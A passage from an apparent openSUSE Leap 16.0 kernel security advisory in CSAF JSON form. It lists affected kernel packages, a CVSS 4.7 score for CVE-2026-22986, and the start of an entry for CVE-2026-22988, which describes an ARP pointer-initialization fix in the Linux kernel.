"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22986"
},
{
"cve": "CVE-2026-22988",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22988"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: do not assume dev_hard_header() does not change skb-\u003ehead\n\narp_create() is the only dev_hard_header() caller\nmaking assumption about skb-\u003ehead being unchanged.\n\nA recent commit broke this assumption.\n\nInitialize @arp pointer after dev_hard_header() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
